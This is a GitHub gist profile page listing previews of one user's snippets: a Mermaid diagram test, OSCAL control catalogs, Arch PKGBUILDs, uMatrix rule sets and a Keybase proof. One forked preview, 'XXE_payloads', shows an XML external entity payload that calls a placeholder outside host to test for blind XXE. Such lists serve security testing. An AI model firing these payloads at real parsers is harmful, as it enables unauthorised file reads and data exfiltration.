Skip to content

Instantly share code, notes, and snippets.

View xee5ch's full-sized avatar

Al xee5ch

View GitHub Profile
@xee5ch
xee5ch / test.md
Last active April 9, 2024 03:54
Testing block-beta mermaid files
block-beta
  block:e:3
          l["left"]
          m("A wide one in the middle")
          r["right"]
          l["col 1"]
          m("col 2")
          r["col 3"]
 end
@xee5ch
xee5ch / controls_catalog.json
Created March 14, 2023 22:12
cloud-native-security-controls/controls-catalog#25 sample catalog from commit efd54969bd1abf8a253418d8a43c4c8b303147e8
{
"uuid": "d74dc2ba-eb2e-44b7-93e2-457076506395",
"metadata": {
"title": "Cloud Native Security Controls Catalog",
"published": null,
"last_modified": "2023-03-14T18:07:44.230+00:00",
"version": "0.0.1",
"oscal_version": "1.0.2",
"revisions": null,
"document_ids": null,
@xee5ch
xee5ch / csf_catalog.xml
Created February 19, 2023 00:30
Catalogs in OSCAL 1.0.4 may erroneously require parts to have IDs?
<?xml version="1.0" encoding="UTF-8"?>
<catalog uuid="382c2910-3f85-40d1-9724-7180fdabcc24"
xmlns="http://csrc.nist.gov/ns/oscal/1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://csrc.nist.gov/ns/oscal/1.0 https://raw.githubusercontent.com/usnistgov/OSCAL/v1.0.4/xml/schema/oscal_complete_schema.xsd">
<metadata>
<title>NIST Cybersecurity Framework</title>
<last-modified>2023-02-18T12:47:36.496-05:00</last-modified>
<version>1.1</version>
<oscal-version>1.0.4</oscal-version>
@xee5ch
xee5ch / PKGBUILD.txt
Created May 29, 2021 22:29
Current example PKGBUILD for imdone
# Maintainer: Al S < tei8ho.aur.al@ila5.info>
pkgname=imdone-bin
_pkgname=imdone
pkgver=1.17.6
pkgrel=1
pkgdesc="Simple and powerful kanban board that works on top of a local folder of plain text markdown files or code."
arch=('i686' 'x86_64')
provides=('imdone')
url="https://imdone.io/"
license=('custom:imdone')
class SecurityAssessment extends SecurityAssessmentPlanSAP {}
@xee5ch
xee5ch / XXE_payloads
Created March 14, 2017 14:22 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@xee5ch
xee5ch / umatrix-user-rules-xee5ch-custom-starter-template.txt
Created December 18, 2016 08:40
My preferred uMatrix rules to start out a new profile, block pretty much everything, including 1st party stuff. Only allow CSS and Images to make it readable before enabling, scripts, cookies, etc.
https-strict: * true
matrix-off: about-scheme true
matrix-off: behind-the-scene true
matrix-off: chrome-extension-scheme true
matrix-off: chrome-scheme true
matrix-off: localhost true
matrix-off: opera-scheme true
referrer-spoof: * true
ua-spoof: * true
* * * block
@xee5ch
xee5ch / umatrix-user-rules-default.txt
Created December 18, 2016 08:38
Default ruleset implemented by uMatrix when installed on Chrome/Chromium at the time of publication for this gist.
https-strict: * true
matrix-off: about-scheme true
matrix-off: behind-the-scene true
matrix-off: chrome-extension-scheme true
matrix-off: chrome-scheme true
matrix-off: localhost true
matrix-off: opera-scheme true
referrer-spoof: * true
* * * block
* * css allow

Keybase proof

I hereby claim:

  • I am xee5ch on github.
  • I am ay5lee4k (https://keybase.io/ay5lee4k) on keybase.
  • I have a public key whose fingerprint is FE39 2A56 BF95 E9B5 E14B CA6D 3729 EB09 8C25 62FF

To claim this, I am signing this object:

@xee5ch
xee5ch / PKGBUILD_xonsh_git_branch_andor
Last active March 16, 2016 19:13
A custom Arch AUR PKGBUILD file for use with xonsh-git, but with the andor branch.
# Maintainer: megadriver <megadriver at gmx dot com>
pkgname=xonsh-git
_gitname=xonsh
pkgver=0.2.6.r5.g54a11e7
pkgrel=1
pkgdesc="A Python-ish, BASHwards-compatible shell"
url="http://github.com/scopatz/xonsh"
arch=('any')
license=('FreeBSD')